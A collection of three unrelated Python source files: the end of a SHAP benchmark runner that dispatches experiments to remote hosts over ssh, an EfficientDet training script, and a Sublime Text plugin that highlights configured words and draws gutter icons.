worker_lock.acquire()
try:
total_sent += 1
__print_status()
finally:
worker_lock.release()
__run_remote_experiment(experiment, hostname, python_binary=python_binary)
# record how many are finished
worker_lock.acquire()
try:
total_done += 1
__print_status()
finally:
worker_lock.release()
q.task_done()
def __print_status():
print("Benchmark task %d of %d done (%d failed, %d running)" % (total_done, nexperiments, total_failed, total_sent - total_done), end="\r")
sys.stdout.flush()
def run_remote_experiments(experiments, thread_hosts, rate_limits={}):
""" Use ssh to run the experiments on remote machines in parallel.
Parameters
----------
experiments : iterable
Output of shap.benchmark.experiments(...).
thread_hosts : list of strings
Each host has the format "host_name:path_to_python_binary" and can appear multiple times
in the list (one for each parallel execution you want on that machine).
"""
# first we kill any remaining workers from previous runs
# note we don't check_call because pkill kills our ssh call as well
thread_hosts = copy.copy(thread_hosts)
random.shuffle(thread_hosts)
for host in set(thread_hosts):
hostname,_ = host.split(":")
try:
subprocess.run(["ssh", hostname, "pkill -f shap.benchmark.run_experiment"], timeout=15)
except subprocess.TimeoutExpired:
print("Failed to connect to", hostname, "after 15 seconds! Exiting.")
return
global nexperiments
experiments = copy.copy(list(experiments))
random.shuffle(experiments) # this way all the hard experiments don't get put on one machine
nexperiments = len(experiments)
q = Queue()
for host in thread_hosts:
worker = Thread(target=__thread_worker, args=(q, host))
worker.daemon = True
worker.start()
for experiment in experiments:
q.put(experiment)
q.join()
def __run_remote_experiment(experiment, remote, cache_dir="/tmp", python_binary="python"):
global total_failed
dataset_name, model_name, method_name, metric_name = experiment
# see if we have a cached version
cache_id = __gen_cache_id(experiment)
cache_file = os.path.join(cache_dir, cache_id + ".pickle")
if os.path.isfile(cache_file):
with open(cache_file, "rb") as f:
return pickle.load(f)
# this is just so we don't dump everything at once on a machine
time.sleep(random.uniform(0,5))
# run the benchmark on the remote machine
#start = time.time()
cmd = "CUDA_VISIBLE_DEVICES=\"\" "+python_binary+" -c \"import shap; shap.benchmark.run_experiment(['%s', '%s', '%s', '%s'], cache_dir='%s')\" &> %s/%s.output" % (
dataset_name, model_name, method_name, metric_name, cache_dir, cache_dir, cache_id
)
try:
subprocess.check_output(["ssh", remote, cmd])
except subprocess.CalledProcessError as e:
print("The following command failed on %s:" % remote, file=sys.stderr)
print(cmd, file=sys.stderr)
total_failed += 1
print(e)
return
# copy the results back
subprocess.check_output(["scp", remote+":"+cache_file, cache_file])
if os.path.isfile(cache_file):
with open(cache_file, "rb") as f:
#print(cache_id.replace("__", " ") + " ...loaded from remote after %f seconds" % (time.time() - start))
return pickle.load(f)
else:
raise Exception("Remote benchmark call finished but no local file was found!")
def __gen_cache_id(experiment):
dataset_name, model_name, method_name, metric_name = experiment
return "v" + "__".join([__version__, dataset_name, model_name, method_name, metric_name])
|
main.py
|
# Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
from tensorflow.python.ops import custom_gradient # pylint:disable=g-direct-tensorflow-import
from tensorflow.python.framework import ops # pylint:disable=g-direct-tensorflow-import
def get_variable_by_name(var_name):
"""Given a variable name, retrieves a handle on the tensorflow Variable."""
global_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def _filter_fn(item):
try:
return var_name == item.op.name
except AttributeError:
# Collection items without operation are ignored.
return False
candidate_vars = list(filter(_filter_fn, global_vars))
if len(candidate_vars) >= 1:
# Filter out non-trainable variables.
candidate_vars = [v for v in candidate_vars if v.trainable]
else:
raise ValueError("Unsuccessful at finding variable {}.".format(var_name))
if len(candidate_vars) == 1:
return candidate_vars[0]
elif len(candidate_vars) > 1:
raise ValueError(
"Unsuccessful at finding trainable variable {}. "
"Number of candidates: {}. "
"Candidates: {}".format(var_name, len(candidate_vars), candidate_vars))
else:
# The variable is not trainable.
return None
custom_gradient.get_variable_by_name = get_variable_by_name
import tensorflow.compat.v1 as tf
tf.disable_eager_execution()
import dataloader
import det_model_fn
import hparams_config
import utils
flags.DEFINE_string(
'tpu',
default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url.')
flags.DEFINE_string(
'gcp_project',
default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone',
default=None,
help='GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
'use_xla', False,
'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
'initialization.')
flags.DEFINE_string('ckpt', None,
'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
'num_cores_per_replica',
default=2,
help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
'input_partition_dims', [1, 2, 1, 1],
'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 100,
'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 100,
'Number of iterations per checkpoint save')
flags.DEFINE_string(
'train_file_pattern', None,
'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('val_file_pattern', None,
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
'val_json_file', None,
'COCO validation JSON containing golden bounding boxes. If None, use the '
'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
'COCO testdev dir. If not None, ignore val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_enum('mode', 'train', ['train', 'eval', 'train_and_eval'],
'Mode to run: train, eval or train_and_eval')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_train', False, 'Run one eval after the '
'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
'Minimum seconds between evaluations.')
flags.DEFINE_integer(
'eval_timeout', None,
'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
'run_epoch_in_child_process', False,
'This option helps to rectify CPU memory leak. If True, every epoch is '
'run in a separate process for train and eval and memory will be cleared.'
'Drawback: need to kill 2 processes if training needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
if FLAGS.strategy == 'tpu':
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
tpu_grpc_url = tpu_cluster_resolver.get_master()
tf.Session.reset(tpu_grpc_url)
else:
tpu_cluster_resolver = None
# Check data path
if FLAGS.mode in ('train', 'train_and_eval'):
if FLAGS.train_file_pattern is None:
raise RuntimeError('Must specify --train_file_pattern for train.')
if FLAGS.mode in ('eval', 'train_and_eval'):
if FLAGS.val_file_pattern is None:
raise RuntimeError('Must specify --val_file_pattern for eval.')
# Parse and override hparams
config = hparams_config.get_detection_config(FLAGS.model_name)
config.override(FLAGS.hparams)
if FLAGS.num_epochs: # NOTE: remove this flag after updating all docs.
config.num_epochs = FLAGS.num_epochs
# Parse image size in case it is in string format.
config.image_size = utils.parse_image_size(config.image_size)
# The following is for spatial partitioning. `features` has one tensor while
# `labels` has 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
# partition is performed on `features` and all partitionable tensors of
# `labels`, see the partition logic below.
# In the TPUEstimator context, the meaning of `shard` and `replica` is the
# same; following the API, both terms are used interchangeably here.
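# Example with the defaults: --input_partition_dims=[1, 2, 1, 1] has product 2,
# so --num_cores_per_replica must also be 2 (checked just below), and
# --num_cores=8 then yields 8 // 2 = 4 shards.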
if FLAGS.use_spatial_partition:
# Checks input_partition_dims agrees with num_cores_per_replica.
if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
raise RuntimeError('--num_cores_per_replica must be a product of array '
'elements in --input_partition_dims.')
labels_partition_dims = {
'mean_num_positives': None,
'source_ids': None,
'groundtruth_data': None,
'image_scales': None,
'image_masks': None,
}
# The Input Partition Logic: We partition only the partition-able tensors.
feat_sizes = utils.get_feat_sizes(
config.get('image_size'), config.get('max_level'))
for level in range(config.get('min_level'), config.get('max_level') + 1):
def _can_partition(spatial_dim):
partitionable_index = np.where(
spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
spatial_dim = feat_sizes[level]
if _can_partition(spatial_dim['height']) and _can_partition(
spatial_dim['width']):
labels_partition_dims['box_targets_%d' %
level] = FLAGS.input_partition_dims
labels_partition_dims['cls_targets_%d' %
level] = FLAGS.input_partition_dims
else:
labels_partition_dims['box_targets_%d' % level] = None
labels_partition_dims['cls_targets_%d' % level] = None
num_cores_per_replica = FLAGS.num_cores_per_replica
input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
num_shards = FLAGS.num_cores // num_cores_per_replica
else:
num_cores_per_replica = None
input_partition_dims = None
num_shards = FLAGS.num_cores
params = dict(
config.as_dict(),
model_name=FLAGS.model_name,
iterations_per_loop=FLAGS.iterations_per_loop,
model_dir=FLAGS.model_dir,
num_shards=num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
strategy=FLAGS.strategy,
backbone_ckpt=FLAGS.backbone_ckpt,
ckpt=FLAGS.ckpt,
val_json_file=FLAGS.val_json_file,
testdev_dir=FLAGS.testdev_dir,
profile=FLAGS.profile,
mode=FLAGS.mode)
config_proto = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False)
if FLAGS.strategy != 'tpu':
if FLAGS.use_xla:
config_proto.graph_options.optimizer_options.global_jit_level = (
tf.OptimizerOptions.ON_1)
config_proto.gpu_options.allow_growth = True
model_dir = FLAGS.model_dir
model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
max_instances_per_image = config.max_instances_per_image
if FLAGS.eval_samples:
eval_steps = int((FLAGS.eval_samples + FLAGS.eval_batch_size - 1) //
FLAGS.eval_batch_size)
else:
eval_steps = None
total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
train_steps = total_examples // FLAGS.train_batch_size
logging.info(params)
if not tf.io.gfile.exists(model_dir):
tf.io.gfile.makedirs(model_dir)
config_file = os.path.join(model_dir, 'config.yaml')
if not tf.io.gfile.exists(config_file):
tf.io.gfile.GFile(config_file, 'w').write(str(config))
train_input_fn = dataloader.InputReader(
FLAGS.train_file_pattern,
is_training=True,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
eval_input_fn = dataloader.InputReader(
FLAGS.val_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
if FLAGS.strategy == 'tpu':
tpu_config = tf.estimator.tpu.TPUConfig(
FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
num_cores_per_replica=num_cores_per_replica,
input_partition_dims=input_partition_dims,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=model_dir,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
tpu_config=tpu_config,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
# TPUEstimator can do both train and eval.
train_est = tf.estimator.tpu.TPUEstimator(
model_fn=model_fn_instance,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size,
config=run_config,
params=params)
eval_est = train_est
else:
strategy = None
if FLAGS.strategy == 'gpus':
strategy = tf.distribute.MirroredStrategy()
run_config = tf.estimator.RunConfig(
model_dir=model_dir,
train_distribute=strategy,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
def get_estimator(global_batch_size):
params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
params['batch_size'] = global_batch_size // params['num_shards']
return tf.estimator.Estimator(
model_fn=model_fn_instance, config=run_config, params=params)
# train and eval need different estimator due to different batch size.
train_est = get_estimator(FLAGS.train_batch_size)
eval_est = get_estimator(FLAGS.eval_batch_size)
# start train/eval flow.
if FLAGS.mode == 'train':
train_est.train(input_fn=train_input_fn, max_steps=train_steps)
if FLAGS.eval_after_train:
eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
elif FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir,
min_interval_secs=FLAGS.min_eval_interval,
timeout=FLAGS.eval_timeout):
logging.info('Starting to evaluate.')
try:
eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
# Terminate eval job when final checkpoint is reached.
try:
current_step = int(os.path.basename(ckpt).split('-')[1])
except IndexError:
logging.info('%s has no global step info: stop!', ckpt)
break
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
if current_step >= train_steps:
logging.info('Eval finished step %d/%d', current_step, train_steps)
break
except tf.errors.NotFoundError:
# Checkpoint might have been deleted by the time eval finished.
# We simply skip such cases.
logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
elif FLAGS.mode == 'train_and_eval':
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
try:
step = int(os.path.basename(ckpt).split('-')[1])
current_epoch = (
step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
except (IndexError, TypeError):
logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
current_epoch = 0
def run_train_and_eval(e):
print('\n =====> Starting training, epoch: %d.' % e)
train_est.train(
input_fn=train_input_fn,
max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
print('\n =====> Starting evaluation, epoch: %d.' % e)
eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
epochs_per_cycle = 1 # higher number has less graph construction overhead.
for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
if FLAGS.run_epoch_in_child_process:
p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
p.start()
p.join()
if p.exitcode != 0:
return p.exitcode
else:
tf.reset_default_graph()
run_train_and_eval(e)
else:
logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
app.run(main)
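# Hedged example invocation (paths and values below are placeholders; all flags
# are defined above):
#   python main.py --mode=train_and_eval --strategy=gpus \
#     --train_file_pattern=/data/coco/train-*.tfrecord \
#     --val_file_pattern=/data/coco/val-*.tfrecord \
#     --model_name=efficientdet-d1 --model_dir=/tmp/efdet-d1 \
#     --train_batch_size=64 --eval_batch_size=1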
|
CustomHighlighter.py
|
import re
import os
import time
import zlib
import struct
import threading
from functools import partial
import sublime
import sublime_plugin
from .settings import Settings, SettingTogglerCommandMixin
from .colorizer import SchemaColorizer
# if $$highlighter$$ is colored in this comment
# then no colors have been configured
NAME = "Custom Highlighter"
regex_cache = None
re_cache = None
fallback_colors = {
"$$highlighter$$": "#ffd700", # fallback placeholder
}
def regex_factory():
global regex_cache
if regex_cache is not None:
colors_regex, colors_regex_capture = regex_cache
else:
colors = settings.get('colors', {})
if not colors:
colors = fallback_colors
# print({
# "colors": colors,
# })
colors_regex = r'(%s)' % r'(?<![-.\w])%s(?![-.\w])' % r'(?![-.\w])|(?<![-.\w])'.join(map(lambda key: re.escape(key), colors.keys()))
# print({
# "colors_regex": colors_regex,
# })
# colors_regex = []
# if simple_colors:
# colors_regex = r'(%s)' % colors_regex
# colors_regex = r'|'.join(colors_regex)
colors_regex_capture = r'\1'
# if len(colors_regex):
# colors_regex_capture = r'|\1'
# else:
# colors_regex_capture = ''
regex_cache = colors_regex, colors_regex_capture
# print({
# "regex_cache": regex_cache,
# })
return colors_regex, colors_regex_capture
def re_factory():
global re_cache
if re_cache is not None:
colors_re, colors_re_capture = re_cache
else:
colors_regex, colors_regex_capture = regex_factory()
colors_re = re.compile(colors_regex)
colors_re_capture = re.sub(r'\\([0-9])', lambda m: chr(int(m.group(1))), colors_regex_capture)
re_cache = colors_re, colors_re_capture
return colors_re, colors_re_capture
# Full PNG is: PNG_HEAD + PNG_IHDR + PNG_IDAT[mode] + PNG_IEND
PNG_HEAD = b'\x89PNG\r\n\x1a\n'
PNG_IHDR = b'\x00\x00\x00\x0dIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4'
PNG_IDAT = {
'circle': b'\x00\x00\x01\x13IDATx\x9c\xed\xd6\xc1\r\xc3 \x0c@QX!g\xa4\x8c\xd0\x11:BF\xe8\x01q\xee\x1c\xdd\x82e2\x00\xb30\x00\xb5U#U\x11\x85`\xac\xe6\xc2\xe1_\xc3K\x93\xd8U)%ue\x97\x1e>\x01\x13P\x05\xac\xb7{)\x03Y\xc8C\x01\x8a\xdb\xe3\x89\x05\xc8C\x162\x90:6\n\xd0\x90\x83v(}\x07\x17?\xb6C\x0e\xd2R\x80\x05z\x1d\x0f\xae\x00r/h\x19\x05\xe8\xda\xe1\r@F\xe8\x11\x80\xab\x1d~\x02\x90\xe8q\xb0\x00\xa6\xf4\xcc\x19\x00|\'\x0c\x07`[\x87\x9f\x04`\x96\x03\xf0\x82\x00\xcf\x01\x04A@\xe0\x00\xa2 v\x03h\xc25/~\x06\x897\xc3\x01\x04A@\xff#\xa0\xd9.\x05\xe8\x7f\ti\xb1H\x01\xfa?\xc3\xed\xb3\xd5v\x01\x00\x0e\xb3\xfeADK\xc4\t\x00p\x9c\xf7\x8fb\x02hZ(\\\x00.2=\x02\xc0\x96\x1a\xa2q8\xaer5\n\xc8\xbf\x84+\xbd\x13?\x9e\xb9\xcbw.\x05\xc8\x19\xfa:<\xcd\x89H\x133\xd0\xee\xc0\x05f\xd6\xc2\xdf\xb9n\xc0\xbf\x9a\x80\t\xb8\x1c\xf0\x06-\x9f\xcd\xf4\x17\xe9(\x03',
'square': b'\x00\x00\x00\x4aIDATx\x9c\xed\xceA\r\x00 \x0cC\xd19A\x02\x12\x90\x80\x04$\xe0\xff\xd49 =\xb1,\xf9\x87\x7fm_H\x8a\xcaJ\xcf\x01\x00x\x02\xc6\\r\xda\xe7Z\x01\x00\x00\x00@?\x80;\xecB\x01\x00\x00\x00\xa0\x1f\xe0W\x00\x00\x94\x03\x12\\\xf0$\x87\xd4i\x0c\x98',
'fill': b'\x00\x00\x00\x40IDATx\x9c\xed\xcf1\x11\x00 \x10\x03\xc1w\x82\x04$ \x01\tH\xc0\x7f\x05"R|\xb3\xc5\xb5\x99M\x8d\xb9^\xd2>7\xaa\x00\x00\x00\x00\x00\x00\x00\xda\x01\xe9@z\x00\x00\x00\x00\x00\x00\x00\xa0\x1d\xf0\x01\xb4]Pj]\x9av\xf7',
}
PNG_IEND = b'\x00\x00\x00\x00IEND\xaeB`\x82'
PNG_RE = re.compile(b'\\x1f\\x2f\\x3f|\\x4f\\x5f\\x6f')
PNG_DATA = {
'circle': zlib.decompress(PNG_IDAT['circle'][8:-4]),
'square': zlib.decompress(PNG_IDAT['square'][8:-4]),
'fill': zlib.decompress(PNG_IDAT['fill'][8:-4]),
}
DEFAULT_GUTTER_ICON = 'circle'
def toicon(name, gutter_icon=True, light=True):
base_path = os.path.join(sublime.packages_path(), 'User', '%s.cache' % NAME)
if not os.path.exists(base_path):
os.mkdir(base_path)
if gutter_icon not in PNG_DATA:
gutter_icon = DEFAULT_GUTTER_ICON
icon_path = os.path.join(base_path, name + '_' + gutter_icon + '.png')
if not os.path.exists(icon_path):
r = int(name[4:6], 16)
g = int(name[6:8], 16)
b = int(name[8:10], 16)
a = int(name[10:12] or 'ff', 16) / 255.0
# print("r={} g={} b={} a={}".format(r, g, b, a))
if light:
x = 0xff * (1 - a)
y = 0xcc * (1 - a)
else:
x = 0x99 * (1 - a)
y = 0x66 * (1 - a)
r *= a
g *= a
b *= a
# print("x(r={} g={} b={}), y(r={} g={} b={})".format(int(r + x), int(g + x), int(b + x), int(r + y), int(g + y), int(b + y)))
I1 = lambda v: struct.pack("!B", v & (2**8 - 1))
I4 = lambda v: struct.pack("!I", v & (2**32 - 1))
png = PNG_HEAD + PNG_IHDR
col_map = {
b'\x1f\x2f\x3f': I1(int(r + x)) + I1(int(g + x)) + I1(int(b + x)),
b'\x4f\x5f\x6f': I1(int(r + y)) + I1(int(g + y)) + I1(int(b + y)),
}
data = PNG_RE.sub(lambda m: col_map[m.group(0)], PNG_DATA[gutter_icon])
compressed = zlib.compress(data)
idat = b'IDAT' + compressed
png += I4(len(compressed)) + idat + I4(zlib.crc32(idat))
png += PNG_IEND
with open(icon_path, 'wb') as fp:
fp.write(png)
relative_icon_path = os.path.relpath(icon_path, os.path.dirname(sublime.packages_path()))
relative_icon_path = relative_icon_path.replace('\\', '/')
return relative_icon_path
# Commands
class CustomHighlighterCommand(sublime_plugin.WindowCommand):
def run_(self, edit_token, args={}):
view = self.window.active_view()
view.run_command('custom_highlighter', args)
def is_enabled(self):
return True
class CustomHighlighterEnableLoadSaveCommand(CustomHighlighterCommand):
def is_enabled(self):
enabled = super(CustomHighlighterEnableLoadSaveCommand, self).is_enabled()
if enabled:
if settings.get('highlight') == 'load-save':
return False
return enabled
class CustomHighlighterEnableSaveOnlyCommand(CustomHighlighterCommand):
def is_enabled(self):
enabled = super(CustomHighlighterEnableSaveOnlyCommand, self).is_enabled()
if enabled:
if settings.get('highlight') == 'save-only':
return False
return enabled
class CustomHighlighterDisableCommand(CustomHighlighterCommand):
def is_enabled(self):
enabled = super(CustomHighlighterDisableCommand, self).is_enabled()
if enabled:
if settings.get('highlight') is False:
return False
return enabled
class CustomHighlighterEnableCommand(CustomHighlighterCommand):
def is_enabled(self):
view = self.window.active_view()
if view:
if settings.get('highlight') is not False:
return False
return True
# command to restore color scheme
class CustomHighlighterRestoreCommand(sublime_plugin.TextCommand):
def run(self, edit):
erase_highlight_colors()
colorizer.restore_color_scheme()
all_regs = []
class CustomHighlighterCommand(sublime_plugin.TextCommand):
'''command to interact with linters'''
def __init__(self, view):
self.view = view
self.help_called = False
def run_(self, edit_token, args={}):
'''method called by default via view.run_command;
used to dispatch to appropriate method'''
action = args.get('action', '')
if not action:
return
lc_action = action.lower()
# print({
# "lc_action": lc_action,
# })
if lc_action == 'reset':
self.reset()
elif lc_action == 'off':
self.off()
elif lc_action == 'on':
self.on()
elif lc_action == 'load-save':
self.enable_load_save()
elif lc_action == 'save-only':
self.enable_save_only()
else:
highlight_colors(self.view)
def reset(self):
'''Removes existing lint marks and restores user settings.'''
erase_highlight_colors()
TIMES.clear()
colorizer.setup_color_scheme(self.view.settings())
queue_highlight_colors(self.view, preemptive=True)
def on(self):
'''Turns background linting on.'''
settings.set('highlight', True)
settings.save()
queue_highlight_colors(self.view, preemptive=True)
def enable_load_save(self):
'''Turns load-save linting on.'''
settings.set('highlight', 'load-save')
settings.save()
erase_highlight_colors()
def enable_save_only(self):
'''Turns save-only linting on.'''
settings.set('highlight', 'save-only')
settings.save()
erase_highlight_colors()
def off(self):
'''Turns background linting off.'''
settings.set('highlight', False)
settings.save()
erase_highlight_colors()
class CustomHighlighterViewEventListener(sublime_plugin.ViewEventListener):
def on_modified(self):
if settings.get('highlight') is not True:
return
action = self.view.command_history(0, True)[0]
if action == 'revert':
erase_highlight_colors()
queue_highlight_colors(self.view, preemptive=True)
else:
selection = action != 'paste'
queue_highlight_colors(self.view, preemptive=selection, selection=selection)
def on_close(self):
vid = self.view.id()
if vid in TIMES:
del TIMES[vid]
if vid in CUSTOM_HIGHLIGHTS:
del CUSTOM_HIGHLIGHTS[vid]
def on_activated(self):
if self.view.file_name() is None:
return
vid = self.view.id()
if vid in TIMES:
return
TIMES[vid] = 100
if settings.get('highlight') in (False, 'save-only'):
return
queue_highlight_colors(self.view, preemptive=True)
def on_post_save(self):
if settings.get('highlight') is False:
return
queue_highlight_colors(self.view, preemptive=True)
def on_selection_modified(self):
delay_queue(1000) # on movement, delay queue (to make movement responsive)
TIMES = {} # collects how long it took the color highlight to complete
CUSTOM_HIGHLIGHTS = {} # Highlighted regions
def erase_highlight_colors(view=None):
if view:
vid = view.id()
if vid in CUSTOM_HIGHLIGHTS:
for name in CUSTOM_HIGHLIGHTS[vid]:
view.erase_regions(name)
view.erase_regions(name + '_icon')
CUSTOM_HIGHLIGHTS[vid] = set()
else:
for window in sublime.windows():
for view in window.views():
erase_highlight_colors(view)
def highlight_colors(view, selection=False, **kwargs):
view_settings = view.settings()
colorizer.setup_color_scheme(view_settings)
vid = view.id()
start = time.time()
if len(view.sel()) > 100:
selection = False
if selection:
selected_lines = [ln for r in view.sel() for ln in view.lines(r)]
elif view.size() > 512000:
selected_lines = view.lines(view.visible_region())
else:
selected_lines = None
words = {}
found = []
if selected_lines:
colors_re, colors_re_capture = re_factory()
matches = [colors_re.finditer(view.substr(l)) for l in selected_lines]
matches = [
(
sublime.Region(
selected_lines[i].begin() + m.start(),
selected_lines[i].begin() + m.end()
),
m.groups()
) if m else (None, None)
for i, am in enumerate(matches) for m in am
]
matches = [
(
rg,
''.join(
gr[ord(g) - 1] or '' if ord(g) < 10 else g for g in colors_re_capture
)
)
for rg, gr in matches if rg
]
if matches:
ranges, found = zip(*[q for q in matches if q])
else:
ranges = []
else:
colors_regex, colors_regex_capture = regex_factory()
# print({
# "colors_regex_a": colors_regex,
# "colors_regex_capture": colors_regex_capture,
# })
ranges = view.find_all(colors_regex, 0, colors_regex_capture, found)
# print({
# 'found': found,
# })
colors = settings.get('colors', {})
if not colors:
colors = fallback_colors
# print({
# "colors": colors,
# })
for i, col in enumerate(found):
# mode, _, col = col.partition('|')
# print(col)
# col = col.rstrip(',')
# print(col)
# col = col.split(',')
# print(mode, _, col)
try:
# In the form of: black, #FFFFFFFF
# col0 = col[0]
# col0 = all_names_to_hex.get(col0.lower(), col0.upper())
color = colors[col].upper()
# print({col: color})
if len(color) == 4: #abc
color = '#' + color[1] * 2 + color[2] * 2 + color[3] * 2 + 'FF'
elif len(color) == 5: #abcd
color = '#' + color[1] * 2 + color[2] * 2 + color[3] * 2 + color[4] * 2
elif len(color) == 7: #aabbcc
color += 'FF'
            if re.match(r'^#[A-F0-9]{8}$', color) is None:
raise ValueError('Invalid color format "%s"' % color)
# except (ValueError, IndexError, KeyError) as e:
except (KeyError, ValueError) as e:
# print({
# type(e): e,
# })
continue
        # Fix the case where the color is the same as the background color:
if hasattr(view, 'style'):
bg_col = (view.style()['background'] + 'FF')[:9].upper()
if col == bg_col:
br = int(bg_col[1:3], 16)
bg = int(bg_col[3:5], 16)
bb = int(bg_col[5:7], 16)
ba = int(bg_col[7:9], 16)
br += -1 if br > 1 else 1
bg += -1 if bg > 1 else 1
bb += -1 if bb > 1 else 1
col = '#%02X%02X%02X%02X' % (br, bg, bb, ba)
# print(colorizer)
name = colorizer.add_color(col, colors)
# print({
# "name": name,
# })
if name not in words:
words[name] = [ranges[i]]
else:
words[name].append(ranges[i])
colorizer.update(view)
if selected_lines:
if vid not in CUSTOM_HIGHLIGHTS:
CUSTOM_HIGHLIGHTS[vid] = set()
for name in CUSTOM_HIGHLIGHTS[vid]:
ranges = []
affected_line = False
for _range in view.get_regions(name):
_line_range = False
for _line in selected_lines:
if _line.contains(_range):
_line_range = True
break
if _line_range:
affected_line = True
else:
ranges.append(_range)
if affected_line or name in words:
if name not in words:
words[name] = ranges
else:
words[name].extend(ranges)
else:
erase_highlight_colors(view)
all_regs = CUSTOM_HIGHLIGHTS[vid]
highlight_values = bool(settings.get('highlight_values', True))
gutter_icon = settings.get('gutter_icon', True)
for name, w in words.items():
# print(name, w)
if highlight_values:
view.add_regions(name, w, name, flags=sublime.PERSISTENT)
if gutter_icon:
wi = [sublime.Region(i, i) for i in set(view.line(r).a for r in w)]
view.add_regions(name + '_icon', wi, '%sgutter' % colorizer.prefix, icon=toicon(name, gutter_icon=gutter_icon), flags=sublime.PERSISTENT)
all_regs.add(name)
if not selection:
TIMES[vid] = (time.time() - start) * 1000 # Keep how long it took to do a full color highlight
# print('highlight took %s' % TIMES[vid])
################################################################################
# Queue connection
